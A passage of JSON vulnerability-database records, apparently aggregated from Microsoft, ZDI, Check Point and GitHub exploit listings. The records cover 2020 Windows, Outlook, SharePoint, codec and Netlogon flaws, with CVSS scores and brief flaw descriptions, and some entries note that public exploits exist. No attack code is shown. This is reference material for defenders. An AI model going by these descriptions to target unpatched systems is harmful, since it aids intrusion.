"attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2020-08-11T07:00:00", "type": "mscve", "title": "Netlogon Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2021-02-09T08:00:00", "id": "MS:CVE-2020-1472", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-1472", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "zdi": [{"lastseen": "2022-01-31T21:58:13", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Microsoft 3D Viewer. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of FBX files. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process at low integrity.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-10-14T00:00:00", "type": "zdi", "title": "Microsoft 3D Viewer FBX File Parsing Out-Of-Bounds Read Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17003"], "modified": "2020-10-14T00:00:00", "id": "ZDI-20-1246", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-1246/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T21:58:06", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Microsoft Windows Media Player. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of HEVC streams. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-10-19T00:00:00", "type": "zdi", "title": "Microsoft Windows Media Player HEVC Stream Parsing Out-Of-Bounds Write Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16915"], "modified": "2020-10-19T00:00:00", "id": "ZDI-20-1257", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-1257/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-01-31T21:58:06", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Microsoft Windows. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the WindowsCodecsRaw module. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-10-19T00:00:00", "type": "zdi", "title": "Microsoft Windows Camera Codec Pack Out-Of-Bounds Write Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16968"], "modified": "2020-10-19T00:00:00", "id": "ZDI-20-1258", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-1258/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T21:58:14", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Microsoft Windows. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the camera codec pack library. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-10-14T00:00:00", "type": "zdi", "title": "Microsoft Windows Camera Codec Pack Image Processing Out-Of-Bounds Write Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16967"], "modified": "2020-10-14T00:00:00", "id": "ZDI-20-1245", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-1245/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T21:58:12", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Microsoft Outlook. User interaction is required to exploit this vulnerability in that the target must open a malicious email or view it in the preview pane. The specific flaw exists within the parsing of HTML content in email. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length heap-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current process.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-10-19T00:00:00", "type": "zdi", "title": "Microsoft Outlook HTML Email Heap-based Buffer Overflow Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16947"], "modified": "2020-10-19T00:00:00", "id": "ZDI-20-1249", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-1249/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T21:58:11", "description": "This vulnerability allows remote attackers to disclose sensitive information on affected installations of Microsoft Outlook. User interaction is required to exploit this vulnerability in that the target must open a malicious email or view it in the preview pane. The specific flaw exists within the parsing of HTML content in email. A crafted email can trigger a read before the start of an allocated buffer. An attacker can leverage this in conjunction with other vulnerabilities to execute code in the context of the current process.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-10-19T00:00:00", "type": "zdi", "title": "Microsoft Outlook HTML Email Out-Of-Bounds Read Information Disclosure Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16947"], "modified": "2020-10-19T00:00:00", "id": "ZDI-20-1250", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-1250/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "checkpoint_advisories": [{"lastseen": "2022-02-16T19:37:36", "description": "A code execution vulnerability exists in Microsoft Windows Media Foundation. The vulnerability is due to improper validation of H265 media files. A remote attacker could exploit the vulnerability by enticing a victim user to open a maliciously crafted media file or open the folder containing the file.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-10-13T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Windows Media Foundation H265 Stream Parsing Remote Code Execution (CVE-2020-16915)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16915"], "modified": "2020-10-13T00:00:00", "id": "CPAI-2020-1004", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-02-16T19:35:45", "description": "A remote code execution vulnerability exists in Microsoft SharePoint server. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-12-29T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft SharePoint Server Remote Code Execution (CVE-2020-16951)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16951"], "modified": "2020-12-29T00:00:00", "id": "CPAI-2020-1367", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-02-16T19:37:01", "description": "A remote code execution vulnerability exists in Microsoft SharePoint. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-10-20T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft SharePoint Remote Code Execution (CVE-2020-16952)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16952"], "modified": "2020-11-28T00:00:00", "id": "CPAI-2020-1043", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-02-16T19:37:38", "description": "A remote code execution vulnerability exists in Microsoft Windows. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "ADJACENT_NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-10-13T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Windows TCP/IP Remote Code Execution (CVE-2020-16898)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.5, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:A/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "ADJACENT_NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16898"], "modified": "2020-10-13T00:00:00", "id": "CPAI-2020-0901", "href": "", "cvss": {"score": 5.8, "vector": "AV:A/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-02-16T19:36:41", "description": "A privilege escalation is the act of exploiting a bug, design flaw or configuration oversight in an operating system or software application to gain elevated access to resources that are normally protected. Successful exploitation of this vulnerability could allow an attacker to run arbitrary code with elevated privileges.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2020-11-04T00:00:00", "type": "checkpoint_advisories", "title": "Winlogon Privilege Escalation (CVE-2020-1472)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2020-12-06T00:00:00", "id": "CPAI-2020-1095", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-16T19:37:50", "description": "An elevation of privilege vulnerability exists in Microsoft Netlogon. Successful exploitation of this vulnerability could allow an attacker to run arbitrary code with elevated privileges.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2020-09-21T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Netlogon Elevation of Privilege (CVE-2020-1472)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2020-09-21T00:00:00", "id": "CPAI-2020-0872", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "githubexploit": [{"lastseen": "2022-03-23T17:33:54", "description": "# CVE-2020-16947\nOutlook 2019\u00a0Remote Command Execution\nThis bug ...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-11-21T08:58:32", "type": "githubexploit", "title": "Exploit for Out-of-bounds Write in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16947"], "modified": "2020-11-25T16:33:09", "id": "B5E5F84A-7647-5D17-9E1D-643518A6A3A9", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-07-27T07:54:39", "description": "# CVE-2020-16947\n\nThis vulnerability occurs in Outlook 2019 (16....", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-10-15T14:32:25", "type": "githubexploit", "title": "Exploit for Out-of-bounds Write in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16947"], "modified": "2022-07-27T07:12:20", "id": "8B5E018D-C89A-519A-8923-D1E3290A79C8", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-09T02:21:08", "description": "# CVE-2020-16938\n\n`CVE-2020-16938` is a vulnerability that allow...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-10-21T15:38:22", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16938"], "modified": "2022-08-08T19:50:52", "id": "02065E08-7493-5F8F-BA4C-860931D3D2D3", "href": "", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2022-07-16T04:38:35", "description": "# CVE-2020-16898: \u201cBad Neighbor\u201d\r\n\r\n#### CVSS Score: 8.8 \r\n#### ...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "ADJACENT_NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-10-07T19:56:09", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.5, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:A/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "ADJACENT_NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16898"], "modified": "2022-07-16T03:00:39", "id": "92ED250D-4B79-5B70-A5ED-2A55493C90CA", "href": "", "cvss": {"score": 5.8, "vector": "AV:A/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-02-01T00:00:00", "description": "# CVE-2020-16898\nPo...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "ADJACENT_NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-10-16T23:03:15", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.5, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:A/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "ADJACENT_NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16898"], "modified": "2022-02-07T11:30:33", "id": "AB5BA257-13FA-5667-BDBE-A3E1C4658F49", "href": "", "cvss": {"score": 5.8, "vector": "AV:A/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:53:33", "description": "# CVE-2020-16898\nPoC Ba...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "ADJACENT_NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": 